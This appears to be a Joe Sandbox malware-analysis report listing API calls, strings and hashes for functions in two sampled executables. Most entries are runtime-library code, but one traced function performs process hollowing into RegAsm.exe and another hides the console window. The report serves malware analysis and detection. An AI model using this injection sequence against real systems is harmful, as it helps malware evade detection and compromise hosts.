Part of subcall function 0033A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00337CA8,?,00000000,-00000008), ref: 0033A463

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033B7A9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033B7C9

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 3e22b18f3583040ead9a983f38ced09c2782a9a85eecd155da3914be670b2db0
Instruction ID: 117f55ec6390e5d2c4cb9b46f963a01b00fa3f37e9587113be67c3d02e5d22f4
Opcode Fuzzy Hash: 3e22b18f3583040ead9a983f38ced09c2782a9a85eecd155da3914be670b2db0
Instruction Fuzzy Hash: 0F11C4B5901A157FEA132BB15CCDD6FAA6CDEC63E8F150025F90199201FF34ED0142B1

Function 00342339 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,003410F4,00000000,00000001,00000000,00000000,?,003385B4,00000000,00000000,00000000), ref: 00342350
GetLastError.KERNEL32(?,003410F4,00000000,00000001,00000000,00000000,?,003385B4,00000000,00000000,00000000,00000000,00000000,?,00338B3B,00000000), ref: 0034235C

Part of subcall function 00342322: CloseHandle.KERNEL32(FFFFFFFE,0034236C,?,003410F4,00000000,00000001,00000000,00000000,?,003385B4,00000000,00000000,00000000,00000000,00000000), ref: 00342332

___initconout.LIBCMT ref: 0034236C

Part of subcall function 003422E4: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00342313,003410E1,00000000,?,003385B4,00000000,00000000,00000000,00000000), ref: 003422F7

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,003410F4,00000000,00000001,00000000,00000000,?,003385B4,00000000,00000000,00000000,00000000), ref: 00342381

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 1fdf1a6d55166219ae803340986ca8fb308fba96c58f0e209deb58dedc728d6c
Instruction ID: 777118f54012b1ea01d52077a81744038c7e1cbe22207c5b0ec3ff43209d38d4
Opcode Fuzzy Hash: 1fdf1a6d55166219ae803340986ca8fb308fba96c58f0e209deb58dedc728d6c
Instruction Fuzzy Hash: B2F0123A500519BBCF231FD5DC0898A3FA5EB497A1F454410FD089D221CA71A9249B94

Function 0032A3B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0032A3EF
__IsNonwritableInCurrentImage.LIBCMT ref: 0032A4A3

Strings

csm, xrefs: 0032A48D

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: cf0468dc907460207b0a5f5d46193e28be877f9472c26552973bb3ea86692dcb
Instruction ID: 6e644e2526fd12ca3e433eeaf99e13e23474cc205b9610e27ebf58eff8cb9197
Opcode Fuzzy Hash: cf0468dc907460207b0a5f5d46193e28be877f9472c26552973bb3ea86692dcb
Instruction Fuzzy Hash: BF41D634A006289FCF12EF69EC85A9EBBB5AF45324F148155E8185F352D7B1EE01CF92

Function 0032ACBD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0032ACE2

Strings

RCC, xrefs: 0032ACFC
MOC, xrefs: 0032ACF4

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 870173d915083a5c67623833866721431cefc5186c0443313d2b67dd47952507
Instruction ID: 8d35f669c887e108d4bf30554716b3664957ea7fe9c1be0ec3f0a0aa7f949367
Opcode Fuzzy Hash: 870173d915083a5c67623833866721431cefc5186c0443313d2b67dd47952507
Instruction Fuzzy Hash: CD418B72900619EFCF16DF98ED81AEEBBB5FF48301F198099F9046B211D3359950DB92

Function 003271DA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003279F9
___raise_securityfailure.LIBCMT ref: 00327AE1

Strings

X>N, xrefs: 00327ADC

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: X>N
API String ID: 3761405300-1297076720
Opcode ID: 43d24b1c0a30997b80e5c97f6bc63802e65e81445425772ecbcb71ee076b7219
Instruction ID: 4ee358ca8e9549c591eb7cda1df0dc1aefa01d29f833de714af6a89d816d18b2
Opcode Fuzzy Hash: 43d24b1c0a30997b80e5c97f6bc63802e65e81445425772ecbcb71ee076b7219
Instruction Fuzzy Hash: AE21B3B5910384EBD716CF19F9CA6547BB4BB08712F10547AE5088F2B2D7B09A80CF4D

Function 00327AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00327AFF
___raise_securityfailure.LIBCMT ref: 00327BBC

Strings

X>N, xrefs: 00327BB7

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: X>N
API String ID: 3761405300-1297076720
Opcode ID: e2e8ead5dcd3b31fd6b4875fee351301893eac884e1cebe31265e619ff321919
Instruction ID: 115f249a0e448ec929f2b3ad7ea60df2d053eec81e060cc1ee7ce71ec3d67e19
Opcode Fuzzy Hash: e2e8ead5dcd3b31fd6b4875fee351301893eac884e1cebe31265e619ff321919
Instruction Fuzzy Hash: BC1160B8D14385EBD712DF19F9C96547BB4BB08702B10547AE4088F3A6E7B09A45CF8D

Function 00322420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00322425
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0032246A

Part of subcall function 00325578: _Yarn.LIBCPMT ref: 00325597
Part of subcall function 00325578: _Yarn.LIBCPMT ref: 003255BB

Strings

bad locale name, xrefs: 00322478

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 4f2ff913f08164039d473efd395c12c36a09fb3d1cc3a3ad626ad8992ed43d8b
Instruction ID: 88163bd67b562bbad4427d842071575927f40a607f21eec47f0b102a8b78fdc6
Opcode Fuzzy Hash: 4f2ff913f08164039d473efd395c12c36a09fb3d1cc3a3ad626ad8992ed43d8b
Instruction Fuzzy Hash: 85F01D71501B509ED371DF359804743BAE0AF25310F048E1DD4CACBA41D375E548CBA5

Function 00322CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00322CFF
std::_Lockit::~_Lockit.LIBCPMT ref: 00322D1A

Strings

ios_base::badbit set, xrefs: 00322CF1

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: ios_base::badbit set
API String ID: 593203224-3882152299
Opcode ID: 52a0c46327ba14facef81a55e0b039295c018eb182e8b5c32215e3ecbe962901
Instruction ID: 49ae021c486b7ac06bd57906621db42b319a2ee9db26327741457617883cbf1a
Opcode Fuzzy Hash: 52a0c46327ba14facef81a55e0b039295c018eb182e8b5c32215e3ecbe962901
Instruction Fuzzy Hash: E7E0E671910221EFD726DF18F88579673E4EB54711F21092DE0C6C7196EBB059C0CB85

Analysis Process: 6p7a7injLZJojhETBNhL.exePID: 8004, Parent PID: 7624COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1932
Total number of Limit Nodes:	43

Executed Functions

Function 0069018D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,006900FF,006900EF), ref: 006902FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0069030F
Wow64GetThreadContext.KERNEL32(00000104,00000000), ref: 0069032D
ReadProcessMemory.KERNELBASE(0000008C,?,00690143,00000004,00000000), ref: 00690351
VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 0069037C
WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 006903D4
WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 0069041F
WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 0069045D
Wow64SetThreadContext.KERNEL32(00000104,006A0000), ref: 00690499
ResumeThread.KERNELBASE(00000104), ref: 006904A8

Strings

GetThreadContext, xrefs: 00690267
ReadProcessMemory, xrefs: 0069027A
ress, xrefs: 00690217
WriteProcessMemory, xrefs: 006902A0
SetThreadContext, xrefs: 006902B3
VirtualAllocEx, xrefs: 0069028D
Load, xrefs: 006901CB
ResumeThread, xrefs: 006902C9
TerminateProcess, xrefs: 0069038B
CreateProcessA, xrefs: 00690241
aryA, xrefs: 006901D3
VirtualAlloc, xrefs: 00690254
GetP, xrefs: 0069020F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 006902FB

Memory Dump Source

Source File: 0000000A.00000002.1872506886.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_690000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 976f7eb727afe7738e580ff55891a8d9322b7205ce09c7a1ec1df54b9e004eef
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 33B1E67664024AAFDB60CF68CC80BDA77A9FF88714F158524EA0CEB341D774FA418B94

Function 006F4920 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 214
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,006F4BD0,00000000,00000000,00000000), ref: 006F4BBF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,?,?,?,?,?,?,?,?,006F4C76), ref: 006F4BC8

Strings

Own head, xrefs: 006F4AAD
C, xrefs: 006F4955
Earth, xrefs: 006F4AD3

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: CreateObjectSingleThreadWait
String ID: C$Earth$Own head
API String ID: 1891408510-3365287836
Opcode ID: 2e95adc0e51cfb2ba2ba21031f96ebb32e3bd1902637e7b466c320c554a97082
Instruction ID: 2ac313cbc17e41e2ff8e9e02482f44342c1e6526378097ec949d19a7b0183d72
Opcode Fuzzy Hash: 2e95adc0e51cfb2ba2ba21031f96ebb32e3bd1902637e7b466c320c554a97082
Instruction Fuzzy Hash: 0E718D71A083055BD714DF34CC8577BB7D6BF85304F040A2DFA915B792EB60EA48879A

Function 006F4D20 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShowWindow,7215384A), ref: 006F4D55
GetProcAddress.KERNEL32(00000000), ref: 006F4D5C
GetConsoleWindow.KERNELBASE(?,00000000), ref: 006F4D6B
GetModuleHandleA.KERNEL32(kernel32.dll,FreeConsole), ref: 006F4D7F
GetProcAddress.KERNEL32(00000000), ref: 006F4D86
FreeConsole.KERNELBASE ref: 006F4D92

Part of subcall function 006F4000: GetCurrentThreadId.KERNEL32 ref: 006F406A

Strings

FreeConsole, xrefs: 006F4D75
user32.dll, xrefs: 006F4D50
ShowWindow, xrefs: 006F4D4B
kernel32.dll, xrefs: 006F4D7A

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: AddressConsoleHandleModuleProc$CurrentFreeThreadWindow
String ID: FreeConsole$ShowWindow$kernel32.dll$user32.dll
API String ID: 245968307-4003964729
Opcode ID: 36d69863a1617b95c6db11566d567f69bf4f3a0cb801129c59e7c0f5521540bf
Instruction ID: 647dff957865b0d07ae5f79132dd2c9e46c518cf11157d3efdfbbb222fd34b32
Opcode Fuzzy Hash: 36d69863a1617b95c6db11566d567f69bf4f3a0cb801129c59e7c0f5521540bf
Instruction Fuzzy Hash: 3A11B271A40708ABDB00EBB49D05BBFBBEAEB48711F104625F712D2280EF719D0086A5

Function 006E6494 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,006E65A1,?,?,00000001,00000000,?,?,006E680B,00000021,FlsSetValue,006F94CC,006F94D4,00000001), ref: 006E6555

Strings

ext-ms-, xrefs: 006E64FF
api-ms-, xrefs: 006E64EB

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 4f74fa9a461d156516a689c0d08165f45c03c818edd1d66d826cabe343245449
Instruction ID: f4afb8192d01cfd6ff93aa181bd507f637e1eeb3e7f2dfe6fcf43a14e0e70ea3
Opcode Fuzzy Hash: 4f74fa9a461d156516a689c0d08165f45c03c818edd1d66d826cabe343245449
Instruction Fuzzy Hash: 4721EB32703794BBC7219B66EC44EAE376AEF527A4B151110FA06A73D4DB30EE01C6E0

Function 006F4000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 006F406A
std::_Throw_Cpp_error.LIBCPMT ref: 006F40A5
std::_Throw_Cpp_error.LIBCPMT ref: 006F40AC
std::_Throw_Cpp_error.LIBCPMT ref: 006F40B3
std::_Throw_Cpp_error.LIBCPMT ref: 006F40BA

Strings

Success created., xrefs: 006F4003

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID: Success created.
API String ID: 2261580123-2637490038
Opcode ID: a04d04c479031871f001e680a477a620ca7250edb0d0cc222392ecee747c16eb
Instruction ID: b439c1f178d68ab969daf8832e2415d55ba196d6e72e8b2ec33249a9545d4c8f
Opcode Fuzzy Hash: a04d04c479031871f001e680a477a620ca7250edb0d0cc222392ecee747c16eb
Instruction Fuzzy Hash: 2411AB71E407056AE2B03BF44C03B6775876F11B41F14453EFB45AABC2FEE1980487AA

Function 006DE516 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,Function_0000E3BA,00000000,?,?), ref: 006DE55F
GetLastError.KERNEL32 ref: 006DE56B
__dosmaperr.LIBCMT ref: 006DE572

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 57b01c5a38d084df0473a6367c13f7146204c45ad1b7e5847c5fbb8b12537dbc
Instruction ID: 5ffbe306e342bc6c33e785b97a7fbfa475fca8daf7aac52f1761d228d7cf39a1
Opcode Fuzzy Hash: 57b01c5a38d084df0473a6367c13f7146204c45ad1b7e5847c5fbb8b12537dbc
Instruction Fuzzy Hash: E9015272D00515AFDF15AFA0DC05AEE7BA6EF04365F11405AF9029A350EB72CE50D7A0

Function 006E8A6D Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E81B7: GetConsoleOutputCP.KERNEL32(7215384A,00000000,00000000,00000000), ref: 006E821A

WriteFile.KERNEL32(?,00000000,?,006FF498,00000000,0000000C,00000000,00000000,?,00000000,006FF498,00000010,006E0642,00000000,00000000,00000000), ref: 006E8BD6
GetLastError.KERNEL32(?,00000000), ref: 006E8BE0

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: eeb9e26eabeab301c0e45aec88955f2bfff7cc2e63f25ee3eed0481c4208b6ed
Instruction ID: 65404e8568bb1fd7cb7bca3185430a067172c2096928cd9b3f3e0e3aeb47e145
Opcode Fuzzy Hash: eeb9e26eabeab301c0e45aec88955f2bfff7cc2e63f25ee3eed0481c4208b6ed
Instruction Fuzzy Hash: E96196B1D01389AFDF119FA9C884EEEBBBAAF19714F144055E808A7352DB31D902CB60

Function 006E866F Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,006E8BBC,00000000,00000000,00000000,?,0000000C,00000000), ref: 006E870B
GetLastError.KERNEL32(?,006E8BBC,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,006FF498,00000010,006E0642,00000000,00000000), ref: 006E8731

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 356e8e839153c1f5f3c4c25b6787502d9ca55c940ebe7dbe240b680398d6973d
Instruction ID: 06a6e1ca01c9731d099d002fe1a6389e5335f765b861bc9e99d38b9b35b77ab9
Opcode Fuzzy Hash: 356e8e839153c1f5f3c4c25b6787502d9ca55c940ebe7dbe240b680398d6973d
Instruction Fuzzy Hash: 88218235A012599FCF15CF2ADC809EDB7B6EB49301F2440AAE90AD7211DA30DE42CB65

Function 006E6182 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 006E61CE
GetFileType.KERNELBASE(00000000), ref: 006E61E0

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: c80501a867bc5abf1a140d041be4243b21e80dd9a1d27da6c57dd7d8488e3af2
Instruction ID: 06d5ea85054d81d1b42f3db3d99e5247e3d25287da7adf6a011605f4d8785682
Opcode Fuzzy Hash: c80501a867bc5abf1a140d041be4243b21e80dd9a1d27da6c57dd7d8488e3af2
Instruction Fuzzy Hash: 4011B7315057C18EC7354A3FDC989A27E96AB663B0B38071AF1B7876F2C630D98AD240

Function 006DE3BA Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(006FF048,0000000C), ref: 006DE3CD
ExitThread.KERNEL32 ref: 006DE3D4

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

